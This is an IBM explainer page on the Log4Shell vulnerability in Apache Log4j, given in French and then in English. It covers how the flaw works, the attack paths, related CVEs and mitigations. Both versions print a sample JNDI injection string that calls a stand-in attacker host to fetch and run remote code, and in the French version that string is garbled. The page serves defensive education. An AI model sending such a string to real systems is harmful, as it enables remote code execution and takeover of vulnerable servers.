Qu'est-ce que Log4Shell ?
Découvrir la solution Log4Shell d'IBM Abonnez-vous aux actualités thématiques de sécurité
Illustration montrant un collage de pictogrammes de cloud, d'empreintes digitales et de téléphones mobiles
Qu'est-ce que Log4Shell ?

Log4Shell – également « vulnérabilité Log4J » –, est une vulnérabilité d’exécution de code à distance (Remote Code Execution ou RCE) dans certaines versions de la bibliothèque Java Apache Log4J 2. Log4Shell permet aux pirates d’exécuter pratiquement n’importe quel code sur les systèmes visés, ce qui leur donne le contrôle total des applications et des appareils.

Log4Shell, dont l’identifiant Common Vulnerabilities and Exposures (CVE) est CVE-2021-44228, a un score Common Vulnerability Scoring System (CVSS) de 10, ce qui indique une vulnérabilité critique. Log4Shell est considéré comme l’une des vulnérabilités les plus dangereuses de tous les temps en raison de sa large portée et de ses conséquences potentiellement dévastatrices.  

On estime que 10 % de tous les actifs numériques (lien externe à ibm.com) – y compris les applications web, les services cloud et les terminaux physiques tels que les serveurs – étaient vulnérables à Log4Shell au moment de sa découverte. Les pirates peuvent utiliser Log4Shell pour faire presque n’importe quoi : voler des données (exfiltration de données), installer des ransomwares, capturer des appareils pour des botnets, etc. 

Les chercheurs en sécurité informatique ont découvert Log4Shell en novembre 2021. Apache a publié un correctif en décembre 2021, et toutes les versions de Log4J à partir de 2.17.1 sont exemptes de Log4Shell et des vulnérabilités qui y sont associées. Cependant, la Cybersecurity and Infrastructure Security Agency (CISA) indique que Log4Shell figure toujours parmi les vulnérabilités les plus fréquemment exploitées (lien externe à ibm.com). Log4J est omniprésent dans la chaîne d’approvisionnement logicielle, c’est pourquoi la recherche et la résolution de chaque instance vulnérable peuvent prendre des années. 

En attendant, les équipes de sécurité peuvent prendre d’autres mesures pour réduire l’exposition du réseau, comme nous le verrons plus en détail ci-dessous. 

Coût d’une violation de données

Obtenez des informations pour mieux prendre en charge le risque de violation de données grâce au dernier rapport sur le coût d’une violation de données.

Contenu connexe

Inscrivez-vous pour obtenir le X-Force Threat Intelligence Index

Fonctionnement de Log4Shell

Log4Shell affecte Log4J, une bibliothèque de journalisation open source gérée par l’Apache Software Foundation. Log4J est un logger, c’est à dire un composant logiciel qui enregistre des informations et des événements dans un programme, comme les messages d’erreur et les entrées d’un utilisateur.  

Log4J n’est pas un programme autonome, mais un ensemble de code que les développeurs peuvent intégrer à leurs applications Java au lieu de créer des loggers de A à Z. Les grandes organisations comme Apple, Twitter, Amazon, Microsoft, Cloudflare, Cisco et bien d’autres utilisent Log4J dans leurs logiciels et leurs services. 

Log4Shell résulte de la façon dont les versions vulnérables de Log4J gèrent deux fonctionnalités associées : les recherches Java Naming et Directory Interface (JNDI) et les substitutions de recherche de messages. Chaque fonctionnalité en elle-même est inoffensive, mais l’interaction entre elles constitue une arme puissante pour les pirates.

JNDI est une interface de programmation des applications (API) que les applications utilisent pour accéder aux ressources hébergées sur des serveurs externes. Une recherche JNDI est une commande qui indique à l’application d’accéder à un serveur et de télécharger un objet spécifique, comme un élément de données ou un script. Les anciennes versions de Log4j 2 exécutent automatiquement tout code téléchargé de cette façon.  

La substitution de recherche de message permet aux utilisateurs et aux applications d'envoyer des variables à Log4J dans les messages de journal à l'aide d'une syntaxe particulière : ${prefix:name}. Lorsque Log4J rencontre cette syntaxe, il résout la variable et enregistre la valeur dans le journal. Par exemple, si Log4J a reçu un message comme

{java:version}$

il trouverait la version actuelle de Java qui est exécutée sur l’appareil. Dans le journal, il enregistrerait : « Java version X.XX. » 

En d’autres termes, Log4J ne traite pas les substitutions de recherche de messages comme du texte brut. Il les traite comme des commandes et agit en fonction de ce qu’elles disent. Les pirates peuvent tirer parti de ce fait pour envoyer des commandes de recherche JNDI malveillantes aux applications qui exécutent des versions vulnérables de Log4J. Par exemple, un pirate informatique pourrait envoyer à Log4J une chaîne comme celle-ci :

{jndi:ldap://myevilwebsite.biz/maliciouscode}$

Lorsque Log4J reçoit ce message, il résout la variable en contactant le serveur à myevilwebsite.biz et en téléchargeant l’objet situé dans l’emplacement /maliciouscode. Ce processus conduirait Log4J à exécuter le code Java que le pirate a caché à cet endroit, généralement un logiciel malveillant.  

Comment les pirates exploitent Log4Shell

Les pirates peuvent utiliser des protocoles standard pour activer Log4Shell, ce qui permet au traffic malveillant d’échapper facilement à toute détection. La plupart des attaques qui exploitent Log4Shell utilisent l’un des protocoles suivants : Light Directory Access Protocol (LDAP); Remote Method Invocation (RMI); ou Domain Name System (DNS).

LDAP

Le LDAP est utilisé pour stocker des données dans un emplacement central auquel différentes applications et services peuvent accéder. Le LDAP est la méthode la plus courante utilisée par les pirates pour exploiter Log4Shell. Une attaque classique fonctionne de la façon suivante :  

  • Le pirate configure un serveur LDAP et y stocke un code malveillant.

  • Le pirate envoie une recherche JNDI à un programme à l’aide de Log4J.

  • La recherche JNDI permet au programme d’accéder au serveur LDAP de l’attaquant, de télécharger la charge utile et d’exécuter le code.
RMI

La RMI est une fonctionnalité Java qui permet à une application sur un appareil d'indiquer à une application sur un autre appareil de faire quelque chose, comme partager des informations ou exécuter une fonction.

Les attaques par RMI fonctionnent à peu près de la même manière que les attaques par LDAP : les pirates mettent en place un serveur RMI, incitent la cible à se connecter au serveur et envoient des commandes malveillantes à la cible. 

Les attaques par RMI ne sont pas très courantes, mais certains pirates (lien externe à ibm.com) ont tendance à y recourir, car de plus en plus d’organisations bloquent purement et simplement le trafic LDAP.  

DNS

Les pirates utilisent le DNS pour identifier les cibles. Ils envoient une recherche JNDI à un programme, lui indiquant de se connecter à un serveur DNS qui est sous le contrôle des pirates. Si le serveur DNS enregistre une connexion à partir du programme, les pirates savent que le système sera vulnérable à d’autres tentatives d’exploitation de Log4Shell.  

Exemples d’attaques exploitant Log4Shell

Étant donné que Log4Shell permet aux pirates d’exécuter un code arbitraire, les cybercriminels peuvent utiliser la faille pour lancer de nombreuses attaques. Log4Shell était également une vulnérabilité zero-day au moment de sa découverte, ce qui signifie que les pirates avaient une longueur d’avance pour son exploitation. 

Certaines des premières attaques exploitant Log4Shell ont infecté des ordinateurs avec des cryptojackers, un type de logiciel malveillant qui utilise un appareil pour miner des cryptomonnaies à l’insu du propriétaire. Le botnet Mirai a également exploité la faille pour prendre le contrôle de certains appareils. 

Plusieurs attaques par ransomware ont exploité Log4Shell. Les plus importantes sont celles de la variante Khonsari, qui s’est répandue dans le jeu vidéo Minecraft, et NightSky, qui ciblait les systèmes exécutant VMware Horizon. 

Les access brokers ont utilisé Log4Shell pour établir des « points d’appui » dans les réseaux d’entreprises à haute valeur, souvent en déposant secrètement des chevaux de Troie d’accès à distance (RATs) dans les systèmes compromis. Les access brokers vendent ensuite ces points d’appui à des associés qui proposent des rançongiciels en tant que service ou à d’autres pirates informatiques sur le Dark Web. 

Vulnérabilités liées à Log4Shell

Alors qu’Apache travaillait à un correctif de Log4Shell après sa découverte, une poignée de failles associées ont été mises au jour. En tout, il aura fallu quatre correctifs pour neutraliser complètement Log4Shell et toutes les vulnérabilités associées.

CVE-2021-45046 

Le premier correctif Apache publié, Log4J version 2.15.0, a résolu une grande partie de la vulnérabilité Log4Shell. Cependant, les pirates pouvaient toujours envoyer des recherches JNDI malveillantes aux systèmes qui utilisaient certains paramètres non définis par défaut. Apache a résolu ce problème avec Log4J version 2.16.0.

CVE-2021-45105

La version 2.16.0 s’est également avérée incomplète. Les pirates pouvaient toujours utiliser des recherches de messages malveillantes pour envoyer des systèmes vulnérables dans des récursions infinies, ce qui entraînait des attaques par déni de service. Apache a publié la version 2.17 pour corriger ce problème.

CVE-2021-44832

Moins sévère que les autres, cette faille permettait aux pirates d’exécuter un code à distance, mais ils devaient d’abord obtenir des autorisations élevées et modifier les configurations des journaux. Apache a résolu ce problème avec un quatrième correctif, Log4j version 2.17.1

Atténuation et correction de Log4Shell  

Les chercheurs en sécurité recommandent vivement aux organisations de télécharger et d’installer la dernière version de toutes les instances de Log4J de leurs réseaux, ou au moins la version 2.17.1. L’application des correctifs est le seul moyen de neutraliser complètement Log4Shell. 

Cependant, il est possible que les équipes de sécurité ne soient pas en mesure de corriger immédiatement toutes les instances de Log4J sur leurs réseaux. Les installations vulnérables de Log4J sont souvent des dépendances indirectes, ce qui signifie que les actifs de l’entreprise n’utilisent pas Log4J, mais qu’ils s’appuient sur d’autres applications et services qui le font. Selon Google (lien externe à ibm.com), les instances Log4J les plus vulnérables sont situées au delà du premier niveau de profondeur, et certaines sont situées jusqu’au neuvième niveau de profondeur (niveaux de dépendance).  

Lorsque Log4J est une dépendance indirecte, il devient beaucoup plus difficile pour les équipes de sécurité de la localiser. Lorsqu’ils la trouvent, il est possible qu’ils ne puissent pas la corriger, selon l’endroit où elle est localisée. Si Log4J est au sein d’un package logiciel utilisé par une application tierce, le fournisseur lui-même devra mettre à jour Log4J.  

Même lorsque Log4J est une dépendance directe, elle peut être difficile à repérer. Le processus de développement de logiciels est aujourd’hui très complexe et s’appuie sur des équipes étendues et de vastes ensembles de codes préexistants. Les développeurs ne savent peut-être pas que leurs applications contiennent des versions vulnérables de Log4J, car ces instances peuvent se trouver à l’intérieur de packages logiciels préécrits que les développeurs n’ont pas codés eux-mêmes.

Jusqu’à décembre 2022, 25 % des téléchargements de Log4J (lien externe à ibm.com) étaient encore vulnérables à Log4Shell, ce qui signifie que les utilisateurs utilisent des versions obsolètes de Log4J pour créer de nouveaux actifs. 

Log4J est si largement utilisé dans la chaîne d’approvisionnement logicielle que, selon le Département américain de la sécurité intérieure (lien externe à ibm.com), la recherche et la correction de chaque instance vulnérable pourront encore durer au moins une décennie.

En attendant, les équipes de sécurité peuvent prendre d’autres mesures pour réduire l’exposition du réseau.

Suppression des recherches de messages exécutées par des applications vulnérables  

Les équipes de sécurité peuvent interdire les substitutions de recherche de messages dans Log4J, ce qui permet à Log4J de traiter les messages des pirates comme du texte brut plutôt que comme des commandes à exécuter.

Il existe deux façons de procéder : en définissant les propriétés système « Log4J2.formatMsgNoLookups » sur « true » ou en définissant la valeur de la variable d’environnement LOG4J_FORMAT_MSG_NO_LOOKUPS sur « true ». 

Notez que les versions non corrigées de Log4J souffrent toujours de la CVE-2021-45046, qui permet aux pirates d’envoyer des recherches JNDI malveillantes lorsque certains paramètres autres que ceux par défaut sont utilisés. L’interdiction des recherches de messages n’est donc pas infaillible.  

Supprimer la classe JNDIlookup des applications vulnérables  

Les applications Java utilisent des classes pour définir ce qu’un programme peut faire. Dans Log4J, la classe « JNDIlookup » régit les recherches JNDI. Si cette classe est supprimée du répertoire des classes de Log4J, également appelé classpath, les recherches JNDI ne peuvent plus être effectuées.  

La suppression de l’autorisation des recherches JNDI empêche les pirates d’envoyer des commandes malveillantes, mais elle peut également affecter d’autres fonctions de Log4J et des applications qui l’utilisent. Il peut également être difficile de s’assurer que chaque instance de la classe est supprimée.   

Bloquer le trafic sortant malveillant

Les organisations peuvent utiliser des pare-feu et d’autres outils de cybersécurité pour bloquer le trafic des actifs connectés à Internet qui sont vulnérables aux serveurs contrôlés par les attaquants. Par exemple, les équipes de sécurité peuvent définir des règles pour interdire toutes les connexions à l’aide de protocoles LDAP ou RMI. 

Le blocage du trafic sortant au lieu du trafic entrant permet d’éviter les faux positifs, car les fournisseurs et les chercheurs en sécurité analysent les actifs pour trouver des instances persistantes et non corrigées.  

L’inconvénient est que les pare-feu peuvent bloquer ou entraver les connexions sortantes nécessaires, surtout si une organisation utilise le LDAP ou la RMI pour des raisons légitimes. 

Solutions connexes
IBM Security QRadar Suite

Déjouez les cyberattaques grâce à une suite sécurité connectée et modernisée. Le portefeuille QRadar est doté d’une IA de niveau professionnel et offre des produits intégrés pour la sécurité des points de terminaison, la gestion des journaux, le SIEM et le SOAR, le tout avec une interface utilisateur commune, des informations partagées et des flux de travaux connectés.

    Découvrir la suite QRadar

    Solutions de sécurité et de protection des données

    Mises en œuvre sur site ou dans un cloud hybride, les solutions de sécurité des données d’IBM vous aident à obtenir une meilleure visibilité et une meilleure compréhension pour enquêter sur les cybermenaces et y remédier, appliquer des contrôles en temps réel et gérer la conformité aux réglementations.

      Découvrir les solutions de sécurité et de protection des données

      Équipe de réponse aux incidents X-Force

      La recherche proactive des menaces, la surveillance continue et l’examen approfondi des menaces ne sont que quelques-unes des priorités auxquelles doit faire face un service informatique déjà très occupé. En disposant d’une équipe de réponse aux incidents fiable, vous pouvez réduire votre temps de réponse, minimiser l’impact d’une cyberattaque et vous rétablir plus rapidement.

        Découvrir la réponse aux incidents X-Force
        Ressources Qu’est-ce que le piratage ?

        Le piratage est l’utilisation de moyens non conventionnels ou illicites pour obtenir un accès non autorisé à un appareil numérique, un système informatique ou un réseau informatique.

        Qu’est-ce qu’un logiciel malveillant ?

        Les logiciels malveillants, ou malwares, sont des programmes conçus pour nuire aux systèmes informatiques ou à leurs utilisateurs, par exemple les ransomwares, les chevaux de Troie et les logiciels espions.

        Passez à l’étape suivante

        La solution IBM Security QRadar EDR, anciennement connue sous le nom de ReaQta, permet de répondre en temps quasi réel à des menaces connues et inconnues sur les terminaux grâce à une automatisation intelligente qui est facile à utiliser et qui ne nécessite pas ou peu d’interaction humaine. Prenez des décisions rapides et éclairées grâce à des storyboards de visualisation des attaques. Utilisez la gestion automatisée des alertes pour vous concentrer sur les menaces les plus importantes. Enfin, protégez la continuité des opérations grâce à des capacités avancées d’IA et d’apprentissage en continu.

        Explorer QRadar EDR Réserver une démo live

Home Topics Log4Shell What is Log4Shell?
Explore IBM's Log4Shell solution Subscribe to Security Topic Updates
Illustration showing collage of cloud, fingerprint and mobile phone pictograms
What is Log4Shell?

Log4Shell, also known as the Log4j vulnerability, is a remote code execution (RCE) vulnerability in some versions of the Apache Log4j 2 Java library. Log4Shell allows hackers to run virtually any code they want on affected systems, essentially granting them total control of apps and devices.

Log4Shell—Common Vulnerabilities and Exposures CVE identifier: CVE-2021-44228—has a Common Vulnerability Scoring System (CVSS) score of 10, denoting a critical vulnerability. It is considered one of the most dangerous vulnerabilities ever because of its broad reach and potentially devastating consequences.  

An estimated 10 percent of all digital assets (link resides outside ibm.com)—including web applications, cloud services and physical endpoints like servers—were vulnerable to Log4Shell at the time of its discovery. Hackers can use Log4Shell to do almost anything: steal data (data exfiltration), install ransomware, capture devices for botnets and more. 

Cloud security researchers first discovered Log4Shell in November 2021. Apache released a patch in December 2021, and all versions of Log4J from 2.17.1 onward are free of Log4Shell and its associated vulnerabilities. However, the Cybersecurity and Infrastructure Security Agency (CISA) reports Log4Shell is still among the most commonly exploited vulnerabilities (link resides outside ibm.com). Log4J is pervasive in the software supply chain, so finding and fixing every vulnerable instance may take years. 

In the meantime, security teams can take other steps to reduce network exposure, discussed in further detail below. 

Cost of a Data Breach

Get insights to better manage the risk of a data breach with the latest Cost of a Data Breach report.

Related content

Register for the X-Force Threat Intelligence Index

How Log4Shell works

Log4Shell affects Log4J, an open-source logging library maintained by the Apache Software Foundation. Log4J is a logger, a software component that records information and events in a program, like error messages and user inputs.  

Log4J isn't a standalone program but a package of code that developers can plug into their Java applications instead of building loggers from scratch. Major organizations—including Apple, Twitter, Amazon, Microsoft, Cloudflare, Cisco and many others—use Log4J in their software and services. 

Log4Shell results from how vulnerable versions of Log4J handle two related features: Java Naming and Directory Interface (JNDI) lookups and message lookup substitutions. Each feature on its own would be harmless, but the interaction between them gives hackers a potent weapon.

JNDI is an application programming interface (API) that Java apps use to access resources hosted on external servers. A JNDI lookup is a command that tells the app to go to a server and download a specific object, like a piece of data or a script. Older versions of Log4J 2 automatically run any code downloaded this way.  

Message lookup substitution allows users and apps to send variables to Log4J within log messages by using a specific syntax: ${prefix:name}. When Log4J encounters this syntax, it resolves the variable and records the value in the log. For example, if Log4J received a message that read

${java:version}

it would find out the current version of Java running on the device. In the log, it would record: "Java version X.XX." 

Put another way, Log4J doesn't treat message lookup substitutions like plain text. It treats them like commands and takes action based on what they say. Hackers can take advantage of this fact to send malicious JNDI lookup commands to apps running vulnerable versions of Log4J. For example, a hacker could send Log4J a string like this:

${jndi:ldap://myevilwebsite.biz/maliciouscode}

When Log4J received this message, it would resolve the variable by reaching out to the server at myevilwebsite.biz and downloading the object located at /maliciouscode. This process would lead to Log4J executing whatever Java code the hacker stashed at that location, usually malware.  

How hackers exploit Log4Shell

Hackers can use standard protocols to trigger Log4Shell, making it easier for malicious traffic to evade detection. Most Log4Shell attacks use one of the following protocols: Lightweight Directory Access Protocol (LDAP); Remote Method Invocation (RMI); or Domain Name System (DNS).

LDAP

LDAP is used to store data in a central location where different apps and services can access it. LDAP is the most common method hackers use to exploit Log4Shell. A typical attack works as follows:  

  • The hacker sets up an LDAP server and stores malicious code on it.

  • The hacker sends a JNDI lookup to a program using Log4J.

  • The JNDI lookup causes the program to reach out to the attacker's LDAP server, download the payload, and execute the code.
RMI

RMI is a Java feature that enables an app on one device to tell an app on another device to do something, like share information or perform a function.

RMI attacks work roughly the same way as LDAP attacks: hackers set up an RMI server, trick the target into connecting to their server, and send malicious commands back to the target. 

RMI attacks aren't very common, but some hackers (link resides outside ibm.com) are shifting to RMI because more and more organizations are blocking LDAP traffic altogether.  

DNS

Hackers use DNS to scout for targets. They send a JNDI lookup to a program, telling it to connect to a DNS server that the hackers control. If the DNS server records a connection from the program, the hackers know the system is vulnerable to further Log4Shell exploitation attempts.  

Examples of Log4Shell attacks

Because Log4Shell lets hackers run arbitrary code, cybercriminals can use the flaw to launch a variety of attacks. Log4Shell was also a zero-day vulnerability at the time of its discovery, meaning hackers had a head start on exploiting it. 

Some of the earliest Log4Shell attacks infected computers with cryptojackers, a type of malware that uses a device to mine cryptocurrency without the owner's knowledge. The Mirai botnet has also used the flaw to take over devices. 

Multiple ransomware attacks have leveraged Log4Shell. The most prominent ones include the Khonsari strain, which spread through the video game Minecraft, and NightSky, which targeted systems running VMware Horizon. 

Access brokers have used Log4Shell to establish footholds in high-value corporate networks, often by secretly dropping remote access Trojans (RATs) on compromised systems. Access brokers then sell these footholds to ransomware-as-a-service affiliatesor other hackers on the dark web. 

Vulnerabilities related to Log4Shell

As Apache worked on patching Log4Shell after its discovery, a handful of related flaws came to light. Ultimately, it took four patches to completely fix Log4Shell and all associated vulnerabilities.

CVE-2021-45046 

The first patch Apache released, Log4J version 2.15.0, closed much of the Log4Shell vulnerability. However, hackers could still send malicious JNDI lookups to systems that used certain non-default settings. Apache addressed this flaw with Log4J version 2.16.0.

CVE-2021-45105

Version 2.16.0 also turned out to be incomplete. Hackers could use malicious message lookups to send vulnerable systems into infinite recursions, leading to denial-of-service attacks. Apache released version 2.17 to fix this flaw.

CVE-2021-44832

Less severe than the others, this flaw allowed hackers to execute code remotely, but they needed to gain elevated permissions and change log configurations first. Apache addressed this with a fourth patch, Log4J version 2.17.1.

Mitigating and remediating Log4Shell  

Security researchers strongly recommend that organizations prioritize updating all instances of Log4J in their networks to the latest version, or at least version 2.17.1. Patching is the only way to remediate Log4Shell completely. 

However, security teams may be unable to patch all instances of Log4J in their networks immediately. Vulnerable Log4J installations are often present as indirect dependencies, meaning the company's assets don't use Log4J, but they rely on other apps and services that do. According to Google (link resides outside ibm.com), most vulnerable Log4J instances are more than one level deep, and some are as many as nine levels deep.  

When Log4J is an indirect dependency, it becomes much more difficult for security teams to locate it. When they do find it, they may not be able to patch it, depending on where it exists. If Log4J is buried in a software package used by a third-party app, the security team will need the vendor to update Log4J on its end.  

Even when Log4J is present as a direct dependency, it may be hard to spot. The software development process is highly complex today, relying on large teams and vast arrays of preexisting code. Developers may not realize their apps contain vulnerable versions of Log4J, as those instances may sit deep inside prewritten software packages the devs did not code themselves.

As of December 2022, 25 percent of Log4J downloads (link resides outside ibm.com) were still vulnerable to Log4Shell, meaning people are using outdated versions of Log4J to build new assets. 

Log4J is so widely used in the software supply chain that finding and fixing every vulnerable instance will take at least a decade, according to the US Department of Homeland Security ( link resides outside ibm.com).

In the meantime, security teams can take other steps to reduce network exposure.

Removing message lookups from vulnerable apps  

Security teams can disallow message lookup substitutions in Log4J, making it so that Log4J treats hackers' messages as plain text rather than commands to execute.

There are two ways to do this: by changing the "Log4J2.formatMsgNoLookups" system property to "true" or setting the value of the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to "true." 

Note that unpatched versions of Log4J still suffer from CVE-2021-45046, which allows hackers to send malicious JNDI lookups when certain non-default settings are used. Prohibiting message lookups is, therefore, not foolproof.  

Remove the JNDIlookup class from vulnerable apps  

Java apps use classes to define what a program can do. In Log4J, the "JNDIlookup" class governs JNDI lookups. If this class is removed from Log4J's directory of classes—a.k.a., the classpath—then JNDI lookups can no longer be performed.  

Disallowing JNDI lookups prevents hackers from sending malicious commands, but it can also affect other functions of Log4J and the apps that use it. It can also be difficult to ensure every instance of the class is removed.   

Blocking malicious outbound traffic

Organizations can use firewalls and other cybersecurity tools to block traffic from vulnerable internet-facing assets to attacker-controlled servers. For example, security teams could set rules to disallow all connections using LDAP or RMI protocols. 

Blocking outbound traffic instead of inbound traffic helps avoid false positives, as vendors and security researchers may be scanning assets to find lingering, unpatched instances.  

The downside is that firewalls can block or frustrate necessary outbound connections, especially if an organization uses LDAP or RMI for legitimate reasons. 

Related solutions
IBM Security® QRadar® Suite

Outsmart attacks with a connected, modernized security suite. The QRadar portfolio is embedded with enterprise-grade AI and offers integrated products for endpoint security, log management, SIEM and SOAR—all with a common user interface, shared insights and connected workflows.

    Explore QRadar Suite

    Data security and protection solutions

    Implemented on premises or in a hybrid cloud, IBM data security solutions help you gain greater visibility and insights to investigate and remediate cyberthreats, enforce real-time controls and manage regulatory compliance.

      Explore data security and protection solutions

      X-Force incident response team

      Proactive threat hunting, continuous monitoring and a deep investigation of threats are just a few of the priorities facing an already busy IT department. Having a trusted incident response team on standby can reduce your response time, minimize the impact of a cyberattack, and help you recover faster.

        Explore X-Force incident response
        Resources What is hacking?

        Hacking (also called cyber hacking) is the use of unconventional or illicit means to gain unauthorized access to a digital device, computer system or computer network.

        What is malware?

        Malicious software, or malware, is any program designed to harm computer systems or their users, like ransomware, Trojan horses and spyware.

        Take the next step

        IBM Security QRadar EDR, formerly ReaQta, remediates known and unknown endpoint threats in near real time with easy-to-use intelligent automation that requires little-to-no human interaction. Make quick and informed decisions with attack visualization storyboards. Use automated alert management to focus on threats that matter. And safeguard business continuity with advanced, continously-learning AI capabilities.

        Explore QRadar EDR Book a live demo